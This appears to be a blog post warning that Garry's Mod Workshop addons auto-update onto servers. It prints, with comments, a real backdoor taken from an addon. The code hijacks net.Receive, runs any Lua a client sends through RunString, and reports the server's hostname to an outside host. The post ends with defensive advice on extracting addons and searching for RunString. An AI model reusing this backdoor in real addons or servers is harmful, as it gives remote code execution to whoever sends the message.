Garry's Mod Workshop Backdoors

Garry’s Mod is a pretty popular game now, and it’s easier to use than ever with the built-in Steam Workshop support. Workshop addons can be installed on clients, but servers can also subscribe to addons and have them delivered the same way.

The problem with the Workshop system is that subscribed addons auto-update whenever you launch the game or start the server. You have no say in the matter, short of skipping the subscription altogether and extracting the addon’s GMA into your addons folder by hand.

This means the author of any addon your server is subscribed to (or anyone who takes over the author’s Steam account) can run arbitrary code on your server. All they have to do is push an update containing some malicious Lua; the next time your server restarts it pulls the update, loads it, and they have full control without you doing anything.

The author of the Screen Grabber (Anti-Cheat!) addon did exactly this, and appears to have caused some mayhem on a few servers with this piece of code:

    if (SERVER && game.IsDedicated()) then      -- only runs on a dedicated server, never on a client or listen server
        timer.Simple(30, function()             -- waits 30 seconds after the addon loads before doing anything
            -- Keep the real net.Receive, then replace it with a wrapper that
            -- silently ignores any later attempt to register a handler for
            -- "bdsm", so nothing else on the server can overwrite the backdoor's.
            local onr = net.Receive
            net.Receive = function(n, ...)
                if (n != "bdsm") then
                    onr(n, unpack({...}))       -- same as onr(n, ...)
                end
            end

            -- Register the "bdsm" net message and, through the saved original,
            -- its handler: any connected client that sends the message gets the
            -- string it supplies executed as server-side Lua. The player argument
            -- p is never checked.
            util.AddNetworkString("bdsm")
            onr("bdsm", function(l, p)
                RunString(net.ReadString())
            end)

            -- Phone home with the server's hostname so the author knows which
            -- servers now carry the backdoor; the response and any error are discarded.
            http.Post("http://www.bg-server.3owl.com/", {hn = GetConVarString("hostname"), id = "Screen Capture"}, function(s) end, function(e) end)
        end)
    end

Now imagine someone combined this with a Lua sandbox escape that runs native code, and pushed the update out to thousands of subscribers at once. The consequences would be a lot worse than a few people messing with one server.

So there are a few take-home messages:

  • Auto-updating is bad news. If you’re going to use the Workshop on your server, extract the GMAs and add their contents to your addons folder by hand. That means every update from then on is one you fetch, read and apply yourself, which is the point.
  • If you’re running a popular server, check the code you’re running on it. Most of these backdoors are pretty lame and just call RunString (or CompileString) on whatever a client sends. Even if you don’t know Lua, a “Find in Folders” search for RunString and CompileString will show you whether anything shady is going on. Don’t rely on searching for net.Receive alone: the snippet above stashes it in a local and registers its handler through that alias, but the RunString call is still sitting there to be found.
  • Don’t jump to conclusions about how someone compromised your server. Make sure you know how the attackers got in so you can properly fix the problem; otherwise you clean up the symptoms and leave the way in open.